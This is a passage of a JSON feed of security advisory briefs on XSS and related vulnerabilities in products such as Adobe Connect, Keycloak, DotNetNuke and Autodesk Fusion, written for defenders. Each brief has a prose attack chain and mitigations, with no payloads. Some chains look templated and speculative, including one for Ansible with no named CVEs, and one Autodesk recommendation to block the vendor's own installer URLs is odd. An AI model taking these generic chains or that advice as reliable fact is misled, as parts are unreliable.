form.\u003c/li\u003e\n\u003cli\u003eThe WeGIA application stores the malicious payload in the database without proper sanitization.\u003c/li\u003e\n\u003cli\u003eA legitimate user navigates to a page displaying the compromised \u0026lsquo;Member Name\u0026rsquo; field, such as a member profile page.\u003c/li\u003e\n\u003cli\u003eThe malicious JavaScript code is executed within the user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as stealing cookies or redirecting the user to a malicious website.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability could lead to a range of consequences, including account compromise, data theft, and website defacement. An attacker could steal session cookies and impersonate legitimate users, gaining unauthorized access to sensitive information.  Due to the vulnerability residing in a web application, impact is limited to the users of the application, potentially exposing sensitive information and allowing threat actors the ability to modify the application.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade WeGIA installations to version 3.6.10 or later to remediate CVE-2026-40286.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization on all user-supplied data, especially in the \u0026lsquo;Member Name\u0026rsquo; field, to prevent XSS attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003etitle: \u0026quot;Detect WeGIA XSS Attempt via HTTP Request\u0026quot;\u003c/code\u003e to detect potential XSS payloads in HTTP requests.\u003c/li\u003e\n\u003cli\u003eEnable web server logging and monitor for suspicious activity, such as unusual characters or script tags in HTTP request parameters, to identify potential XSS attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-17T21:16:34Z","date_published":"2026-04-17T21:16:34Z","id":"/briefs/2026-04-wegia-xss/","summary":"A stored Cross-Site Scripting (XSS) vulnerability exists in WeGIA versions prior to 3.6.10, allowing attackers to inject malicious scripts into the 'Member Name' field during member registration, leading to persistent execution upon user access.","title":"WeGIA Stored Cross-Site Scripting Vulnerability (CVE-2026-40286)","url":"https://feed.craftedsignal.io/briefs/2026-04-wegia-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cisco","unity-connection","vulnerability","xss","data-manipulation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCisco Unity Connection is susceptible to multiple vulnerabilities that can be exploited by malicious actors. Successful exploitation of these vulnerabilities could allow attackers to perform cross-site scripting (XSS) attacks, redirect users to attacker-controlled malicious websites, manipulate sensitive data, and achieve unauthorized disclosure of confidential information. The vulnerabilities affect Cisco Unity Connection, a unified communications platform. These vulnerabilities pose a significant risk to organizations relying on Cisco Unity Connection for voice messaging and unified communications. Defenders need to implement detection and prevention measures to mitigate potential attacks targeting these flaws.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable Cisco Unity Connection server.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious URL or injects malicious code into a field accessible via the web interface.\u003c/li\u003e\n\u003cli\u003eA legitimate user accesses the crafted URL or interacts with the injected code through the Unity Connection web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s script executes within the user\u0026rsquo;s browser session (XSS).\u003c/li\u003e\n\u003cli\u003eThe attacker uses the XSS vulnerability to redirect the user to a malicious website designed to harvest credentials or install malware.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker leverages the vulnerability to manipulate data stored within Cisco Unity Connection, such as user profiles or configuration settings.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits the vulnerability to gain unauthorized access to sensitive information, such as user credentials, call logs, or system configurations.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the gathered information for further malicious activities, such as gaining unauthorized access to other systems or conducting fraudulent activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities can lead to a range of detrimental outcomes, including unauthorized access to sensitive data, manipulation of critical system configurations, and redirection of users to malicious websites. This can result in data breaches, financial losses, reputational damage, and disruption of communication services. While the exact number of potential victims is unknown, organizations utilizing vulnerable versions of Cisco Unity Connection are at risk. The impact spans various sectors that rely on this technology for unified communications.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect web server logs for unusual URL patterns or requests containing suspicious characters indicative of XSS attempts targeting Cisco Unity Connection interfaces.\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) with rules to detect and block common XSS attack vectors to protect Cisco Unity Connection web interfaces.\u003c/li\u003e\n\u003cli\u003eMonitor Cisco Unity Connection logs for any unauthorized modifications to user profiles or system configurations, which could indicate successful exploitation of data manipulation vulnerabilities.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious URI parameters in Cisco Unity Connection\u003c/code\u003e to identify potential exploitation attempts in web server logs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-16T11:13:57Z","date_published":"2026-04-16T11:13:57Z","id":"/briefs/2026-04-cisco-unity-vulns/","summary":"Multiple vulnerabilities in Cisco Unity Connection can be exploited by an attacker to conduct cross-site scripting attacks, redirect users to malicious websites, manipulate data, and disclose confidential information.","title":"Multiple Vulnerabilities in Cisco Unity Connection","url":"https://feed.craftedsignal.io/briefs/2026-04-cisco-unity-vulns/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.1,"id":"CVE-2026-4344"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","autodesk","cve-2026-4344"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stored cross-site scripting (XSS) vulnerability, identified as CVE-2026-4344, affects the Autodesk Fusion desktop application. The vulnerability occurs due to insufficient sanitization of component names. A malicious actor can inject a crafted HTML payload into a component\u0026rsquo;s name. When a user attempts to delete the component, the malicious payload is displayed within the delete confirmation dialog. If the user interacts with the crafted HTML, the XSS vulnerability is triggered, potentially leading to local file reads or arbitrary code execution within the context of the Autodesk Fusion process. This vulnerability poses a significant risk as it could allow attackers to compromise a user\u0026rsquo;s system through a seemingly benign action within the application.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious HTML payload.\u003c/li\u003e\n\u003cli\u003eThe attacker injects the crafted HTML payload into a component name within Autodesk Fusion.\u003c/li\u003e\n\u003cli\u003eA user attempts to delete the component with the malicious name.\u003c/li\u003e\n\u003cli\u003eThe Autodesk Fusion application displays a delete confirmation dialog containing the malicious HTML payload.\u003c/li\u003e\n\u003cli\u003eThe user clicks or interacts with the malicious HTML payload within the delete confirmation dialog.\u003c/li\u003e\n\u003cli\u003eThe XSS vulnerability is triggered, allowing the attacker to execute arbitrary JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the XSS vulnerability to read local files or execute arbitrary code within the context of the Autodesk Fusion process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access or control over the user\u0026rsquo;s system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-4344 allows a malicious actor to execute arbitrary code within the context of the Autodesk Fusion application. This could lead to the attacker reading local files, modifying sensitive data, or even gaining complete control over the user\u0026rsquo;s system. Due to the widespread use of Autodesk Fusion in engineering and design sectors, this vulnerability could potentially impact a large number of users and organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creations originating from the Autodesk Fusion process (process_creation, product: windows/macos) for suspicious command-line arguments that may indicate exploitation.\u003c/li\u003e\n\u003cli\u003eInspect Autodesk Fusion application logs (if available) for events related to component deletion and HTML rendering, searching for unusual or potentially malicious HTML tags (webserver, product: linux/windows).\u003c/li\u003e\n\u003cli\u003eBlock the download URLs for Autodesk Fusion installers (iocs, type: url) at the network level to prevent attackers from distributing malicious versions of the software.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-15T12:00:00Z","date_published":"2026-04-15T12:00:00Z","id":"/briefs/2026-04-autodesk-xss/","summary":"CVE-2026-4344 is a stored cross-site scripting (XSS) vulnerability in the Autodesk Fusion desktop application where a malicious HTML payload in a component name, when displayed during the delete confirmation dialog and clicked by a user, can lead to arbitrary code execution.","title":"Autodesk Fusion Stored XSS Vulnerability (CVE-2026-4344)","url":"https://feed.craftedsignal.io/briefs/2026-04-autodesk-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["ansible","redhat","vulnerability","dos","xss","code-execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eMultiple vulnerabilities exist in Red Hat Ansible Automation Platform that could be exploited by a remote, anonymous attacker. The vulnerabilities span a wide range of potential impacts, including denial of service (DoS), arbitrary code execution, security bypass, data manipulation, information disclosure, and cross-site scripting (XSS). While the specific CVEs are not detailed, the broad range of potential exploits suggests a critical need for patching and mitigation. The lack of specific targeting information implies a widespread threat affecting any organization utilizing the Red Hat Ansible Automation Platform. Given the potential for arbitrary code execution and data manipulation, a successful attack could lead to significant operational disruption and data breaches.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable endpoint or component within the Red Hat Ansible Automation Platform accessible remotely.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a vulnerability, such as a flaw in input validation, to inject malicious code or scripts.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the initial exploit to achieve arbitrary code execution on the target system.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges to gain control over the Ansible Automation Platform instance.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised platform to manipulate automation workflows and configurations.\u003c/li\u003e\n\u003cli\u003eThe attacker deploys malicious playbooks to managed hosts, leading to further compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive data from the compromised hosts or the Ansible Automation Platform database.\u003c/li\u003e\n\u003cli\u003eThe attacker launches denial-of-service attacks against critical infrastructure components, disrupting operations.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could have severe consequences. A denial-of-service attack could disrupt critical automation processes, leading to significant operational downtime. Arbitrary code execution could allow an attacker to gain complete control over the Ansible Automation Platform and managed hosts. Data manipulation could compromise the integrity of critical systems and data. Information disclosure could expose sensitive credentials and internal data. Cross-site scripting could be used to target administrators and users of the platform. The lack of specific victimology makes it difficult to estimate the number of potential victims, but the widespread use of Ansible suggests that a successful exploit could have a broad impact across numerous sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReview Red Hat security advisories related to Ansible Automation Platform and apply the necessary patches immediately to remediate potential vulnerabilities as they become available.\u003c/li\u003e\n\u003cli\u003eImplement strong input validation and output encoding to prevent code injection and cross-site scripting attacks.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious activity indicative of exploitation attempts, focusing on requests targeting the Ansible Automation Platform web interface.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to detect potential exploitation attempts and malicious activity on the Ansible Automation Platform server (see rules section).\u003c/li\u003e\n\u003cli\u003eReview and harden the security configuration of the Ansible Automation Platform to minimize the attack surface.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls to limit the exposure of sensitive data and functionality.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-15T11:37:19Z","date_published":"2026-04-15T11:37:19Z","id":"/briefs/2026-04-redhat-ansible-vulns/","summary":"A remote, anonymous attacker can exploit multiple vulnerabilities in Red Hat Ansible Automation Platform to perform denial of service, execute arbitrary code, bypass security measures, manipulate data, disclose information, or conduct XSS attacks.","title":"Multiple Vulnerabilities in Red Hat Ansible Automation Platform","url":"https://feed.craftedsignal.io/briefs/2026-04-redhat-ansible-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["keycloak","xss","cross-site scripting","cloud"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA Cross-Site Scripting (XSS) vulnerability exists within Keycloak, a widely-used open-source identity and access management solution. This vulnerability allows a remote, authenticated attacker to inject malicious scripts into web pages viewed by other users. The attacker must possess valid credentials to initially access the vulnerable Keycloak instance. While the specific version affected is not provided in this advisory, it\u0026rsquo;s crucial for organizations using Keycloak to investigate and apply necessary patches or mitigations. The impact of successful exploitation ranges from defacement to sensitive data theft and account compromise. Defenders should prioritize patching Keycloak installations and implementing input validation to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to the Keycloak instance with valid credentials.\u003c/li\u003e\n\u003cli\u003eAttacker identifies a vulnerable input field or parameter within the Keycloak application (e.g., user profile, group name, etc.).\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious payload containing JavaScript code.\u003c/li\u003e\n\u003cli\u003eAttacker injects the malicious payload into the vulnerable input field.\u003c/li\u003e\n\u003cli\u003eThe Keycloak application stores the malicious payload without proper sanitization.\u003c/li\u003e\n\u003cli\u003eA victim user (e.g., another authenticated user or an administrator) accesses the page containing the injected payload.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser executes the malicious JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker can then steal cookies, redirect the user to a malicious site, or perform other actions on behalf of the victim.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability can lead to several negative consequences. An attacker could potentially steal session cookies, allowing them to impersonate other users, including administrators. This could grant them unauthorized access to sensitive data, configuration settings, and management functions. Furthermore, the attacker could deface the Keycloak interface, inject phishing scams, or redirect users to malicious websites. The number of victims depends on the number of users accessing the page with the injected XSS payload.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement input validation and output encoding to prevent XSS attacks within Keycloak.\u003c/li\u003e\n\u003cli\u003eReview Keycloak access logs for suspicious activity related to user profiles and injected scripts.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect possible XSS attempts in Keycloak logs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-15T07:33:56Z","date_published":"2026-04-15T07:33:56Z","id":"/briefs/2026-04-keycloak-xss/","summary":"An authenticated remote attacker can exploit a vulnerability in Keycloak to perform a Cross-Site Scripting attack, potentially leading to unauthorized access and data compromise.","title":"Keycloak Cross-Site Scripting Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-keycloak-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.7,"id":"CVE-2026-34617"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["adobe-connect","xss","cve-2026-34617","privilege-escalation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eAdobe Connect versions 2025.3, 12.10, and prior are vulnerable to a Cross-Site Scripting (XSS) attack, identified as CVE-2026-34617. This vulnerability allows a low-privileged attacker to inject malicious scripts into a web page viewed by other users. Successful exploitation requires user interaction, such as clicking a crafted URL or interacting with a compromised page within the Adobe Connect environment. The vulnerability could allow an attacker to gain elevated access or control over a victim\u0026rsquo;s account or session. Defenders should prioritize patching and consider mitigations to prevent exploitation of this flaw across all platforms where Adobe Connect is deployed.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious URL containing a payload designed to exploit the XSS vulnerability in Adobe Connect.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the crafted URL to potential victims through phishing or other social engineering methods.\u003c/li\u003e\n\u003cli\u003eA user clicks on the malicious URL, which directs their browser to an Adobe Connect page.\u003c/li\u003e\n\u003cli\u003eThe injected XSS payload is executed within the user\u0026rsquo;s browser, leveraging the context of the Adobe Connect application.\u003c/li\u003e\n\u003cli\u003eThe malicious script may steal the user\u0026rsquo;s session cookie, allowing the attacker to hijack their session.\u003c/li\u003e\n\u003cli\u003eAlternatively, the script might modify the content of the Adobe Connect page, tricking the user into performing actions that benefit the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the hijacked session or manipulated actions to gain elevated privileges within the Adobe Connect platform.\u003c/li\u003e\n\u003cli\u003eWith elevated privileges, the attacker can access sensitive data, modify configurations, or perform other malicious actions, impacting other users and the system\u0026rsquo;s integrity.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-34617 allows an attacker to escalate privileges within Adobe Connect. This can lead to unauthorized access to sensitive information, modification of meeting content, and disruption of services. The scope of the impact depends on the level of access achieved by the attacker, potentially affecting all users within the compromised Adobe Connect instance. Given a CVSS v3.1 base score of 8.7, this vulnerability presents a significant risk to organizations using affected versions of Adobe Connect.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately patch Adobe Connect installations to the latest version to remediate CVE-2026-34617.\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) with rules to detect and block common XSS payloads in HTTP requests to Adobe Connect servers.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of clicking on suspicious links and the importance of verifying the legitimacy of URLs before interacting with them.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to your SIEM to detect potential exploitation attempts targeting CVE-2026-34617.\u003c/li\u003e\n\u003cli\u003eEnable web server logging and monitor for suspicious HTTP requests containing potential XSS payloads, focusing on the cs-uri-query and cs-uri-stem fields.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-14T18:17:36Z","date_published":"2026-04-14T18:17:36Z","id":"/briefs/2026-04-adobe-connect-xss/","summary":"Adobe Connect versions 2025.3, 12.10, and earlier are susceptible to a Cross-Site Scripting (XSS) vulnerability (CVE-2026-34617) that can lead to privilege escalation if a user interacts with a malicious URL or compromised web page.","title":"Adobe Connect XSS Vulnerability Leading to Privilege Escalation","url":"https://feed.craftedsignal.io/briefs/2026-04-adobe-connect-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.3,"id":"CVE-2026-27245"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","adobe-connect","cve-2026-27245","reflected-xss"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA reflected Cross-Site Scripting (XSS) vulnerability, identified as CVE-2026-27245, affects Adobe Connect versions 2025.3, 12.10, and earlier. This vulnerability allows an attacker to inject malicious JavaScript code into a user\u0026rsquo;s browser by convincing them to click on a specially crafted URL. When the victim visits the malicious URL, the injected script executes within their browser session, potentially enabling the attacker to steal cookies, redirect the user to a malicious website, or deface the web page. This vulnerability poses a significant risk to Adobe Connect users, as it can lead to account compromise and data breaches. Exploitation requires user interaction, but the impact can be severe.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious URL containing a JavaScript payload within a parameter.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the crafted URL via email, social media, or other means to a targeted user.\u003c/li\u003e\n\u003cli\u003eThe victim clicks on the malicious link, unknowingly initiating the XSS attack.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser sends a request to the Adobe Connect server with the malicious JavaScript in the URL.\u003c/li\u003e\n\u003cli\u003eThe Adobe Connect server reflects the malicious JavaScript code back to the user\u0026rsquo;s browser without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser executes the reflected JavaScript code within the context of the Adobe Connect application.\u003c/li\u003e\n\u003cli\u003eThe attacker can then steal the victim\u0026rsquo;s session cookies.\u003c/li\u003e\n\u003cli\u003eUsing the stolen cookies, the attacker can hijack the victim\u0026rsquo;s session, gaining unauthorized access to their Adobe Connect account and data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this reflected XSS vulnerability (CVE-2026-27245) in Adobe Connect could lead to unauthorized access to user accounts, sensitive data, and the Adobe Connect environment. An attacker could potentially deface web pages, redirect users to phishing sites, or inject malware. The impact ranges from user-specific data theft to wider compromise of the Adobe Connect platform. While the number of victims is unknown, any organization using the affected Adobe Connect versions is vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to a patched version of Adobe Connect that addresses CVE-2026-27245. Refer to the vendor advisory at \u003ca href=\"https://helpx.adobe.com/security/products/connect/apsb26-37.html\"\u003ehttps://helpx.adobe.com/security/products/connect/apsb26-37.html\u003c/a\u003e for specific upgrade instructions.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Adobe Connect XSS Attempt via URI\u003c/code\u003e to identify requests containing suspicious JavaScript payloads targeting Adobe Connect.\u003c/li\u003e\n\u003cli\u003eEducate users to be cautious about clicking on URLs received from untrusted sources to mitigate the initial access vector.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for unusual URI patterns and JavaScript-like syntax using the \u003ccode\u003eDetect Reflected XSS Payloads in URI\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-14T18:16:55Z","date_published":"2026-04-14T18:16:55Z","id":"/briefs/2024-02-adobe-connect-xss/","summary":"Adobe Connect versions 2025.3, 12.10, and earlier are vulnerable to a reflected Cross-Site Scripting (XSS) attack, enabling attackers to execute malicious JavaScript in a victim's browser by enticing them to visit a crafted URL.","title":"Adobe Connect Reflected XSS Vulnerability (CVE-2026-27245)","url":"https://feed.craftedsignal.io/briefs/2024-02-adobe-connect-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["dotnetnuke","xss","svg","web-application"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eDotNetNuke.Core versions prior to 10.2.2 are vulnerable to stored cross-site scripting (XSS). An attacker can exploit this vulnerability by uploading a malicious SVG file to the DotNetNuke server. This file contains embedded JavaScript that executes when the SVG is processed and displayed by the application. Successful exploitation requires a user to interact with the uploaded SVG file, which then triggers the malicious script execution. This poses a significant risk as the injected scripts can target both authenticated and unauthenticated users, potentially leading to session hijacking, data theft, or unauthorized actions performed on behalf of the victim. This vulnerability was published on April 10, 2026, and patched in version 10.2.2.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious SVG file containing embedded JavaScript code designed for XSS exploitation.\u003c/li\u003e\n\u003cli\u003eThe attacker, with low privileges, uploads the malicious SVG file to the DotNetNuke server through a file upload functionality.\u003c/li\u003e\n\u003cli\u003eThe server stores the SVG file, making it accessible to other users.\u003c/li\u003e\n\u003cli\u003eA user (either authenticated or unauthenticated) navigates to the location where the SVG file is stored or displayed.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser processes the SVG file, triggering the execution of the embedded JavaScript.\u003c/li\u003e\n\u003cli\u003eThe malicious script executes within the user\u0026rsquo;s browser session, gaining access to cookies, session tokens, and other sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker steals user\u0026rsquo;s cookies and session tokens.\u003c/li\u003e\n\u003cli\u003eThe attacker uses stolen session tokens to hijack the user\u0026rsquo;s session, perform unauthorized actions, and potentially escalate privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability allows an attacker to execute arbitrary JavaScript code within the context of a user\u0026rsquo;s session. This can lead to sensitive information disclosure, such as stealing user credentials or session cookies. An attacker can then hijack user sessions, perform unauthorized actions on their behalf, and potentially gain elevated privileges within the DotNetNuke application. Due to the nature of stored XSS, the impact can be widespread, affecting any user who interacts with the malicious SVG file until the vulnerability is patched.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade DotNetNuke.Core to version 10.2.2 or later to patch the XSS vulnerability (reference: Affected versions).\u003c/li\u003e\n\u003cli\u003eImplement server-side validation to sanitize uploaded SVG files and prevent the injection of malicious scripts (reference: Description).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule provided below to detect attempts to upload SVG files containing JavaScript code (reference: Sigma rule \u0026ldquo;Detect SVG Upload with Embedded JavaScript\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eConfigure web application firewalls (WAFs) to inspect and block suspicious SVG uploads based on content analysis (reference: Description).\u003c/li\u003e\n\u003cli\u003eEnable logging for file uploads to track potential malicious activity (reference: logsource category \u0026ldquo;file_event\u0026rdquo;).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-11T12:00:00Z","date_published":"2026-04-11T12:00:00Z","id":"/briefs/2026-04-dotnetnuke-xss/","summary":"DotNetNuke.Core is vulnerable to stored cross-site scripting (XSS) where a user can upload a specially crafted SVG file containing malicious scripts, potentially targeting both authenticated and unauthenticated DNN users, with successful exploitation requiring user interaction and leading to high impact on confidentiality, integrity, and availability.","title":"DotNetNuke.Core Stored XSS via SVG Upload","url":"https://feed.craftedsignal.io/briefs/2026-04-dotnetnuke-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.1,"id":"CVE-2025-58920"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","wordpress","reflected-xss"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA reflected XSS vulnerability, identified as CVE-2025-58920, affects the Zootemplate Cerato WordPress theme. The vulnerability resides in versions ranging from n/a through 2.2.18. It stems from the improper neutralization of input during web page generation, which can allow an attacker to inject malicious scripts into a web page viewed by other users. Successful exploitation could allow an attacker to steal cookies, redirect users to malicious websites, or deface web pages. Given the widespread use of WordPress and its themes, this vulnerability poses a risk to websites using the affected Cerato theme.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable endpoint within the Cerato theme that does not properly sanitize user input.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious URL containing a JavaScript payload within a parameter.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the malicious URL via email, social media, or other means.\u003c/li\u003e\n\u003cli\u003eA victim clicks the malicious URL, sending a request to the vulnerable WordPress site.\u003c/li\u003e\n\u003cli\u003eThe WordPress server, using the Cerato theme, reflects the attacker\u0026rsquo;s JavaScript payload in the response without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser executes the malicious JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker gains the ability to perform actions on behalf of the victim, such as stealing cookies or redirecting the user.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this reflected XSS vulnerability can lead to several adverse effects. An attacker could steal a user\u0026rsquo;s session cookies, gaining unauthorized access to their account. Victims can be redirected to phishing sites, potentially compromising their credentials. Further, attackers might inject malicious content into the web page, defacing the site or spreading malware. The impact of this vulnerability is limited by the need for user interaction (clicking a malicious link), but the potential for widespread exploitation remains significant for sites using the vulnerable Cerato theme.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Zootemplate Cerato WordPress theme to a version beyond 2.2.18 to remediate CVE-2025-58920.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect exploitation attempts against this vulnerability (see the \u0026ldquo;Reflected XSS Attempt via GET\u0026rdquo; rule below).\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) with rules to detect and block common XSS payloads to mitigate this and similar vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T14:16:25Z","date_published":"2026-04-10T14:16:25Z","id":"/briefs/2024-01-cerato-xss/","summary":"A reflected cross-site scripting (XSS) vulnerability exists in the Zootemplate Cerato WordPress theme (versions n/a through 2.2.18) due to improper neutralization of user-supplied input, potentially allowing attackers to execute arbitrary JavaScript in a user's browser.","title":"Zootemplate Cerato Theme Reflected XSS Vulnerability (CVE-2025-58920)","url":"https://feed.craftedsignal.io/briefs/2024-01-cerato-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["zammad","vulnerability","code execution","xss"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eZammad, a web-based 